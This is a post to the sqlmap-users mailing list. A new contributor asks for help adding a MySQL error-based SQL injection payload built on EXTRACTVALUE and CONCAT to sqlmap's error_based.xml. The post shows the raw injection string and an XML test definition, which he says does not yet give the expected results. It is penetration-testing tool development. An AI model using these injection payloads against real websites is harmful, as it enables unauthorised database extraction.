Hi all.. first time send e-mail to list =)
My name is daniel, i'm new on contributing to the project..
I trying to implement this kind of payload to the error-based method for mysql,
but i'm having some problems..
The payload i want to implement is:
file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+
I know that 0x0a is the "ENTER" but it can be changed for other chars.. so i
replace it for ':' .. that would be 0x3a
I found the error_based.xml file, and i try some modifications but it keeps
don't getting the expected results.. I'm trying like this:
<test>
<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT
(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0
END)),'[DELIMITER_STOP]'))</payload>
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT
(MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>and extractvalue(0x3a,concat(':',(select
'[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>':'(?P<result>.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>>= 5.1</dbms_version>
</details>
</test>
And i want to don't test for WHERE, HAVING or ORDER BY... just with AND..
Sorry my bad english hope you could understand =)
best regards,
daniel.
github.com/chr0n1c
Sent from [ProtonMail](https://protonmail.com), Swiss-based encrypted email.------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
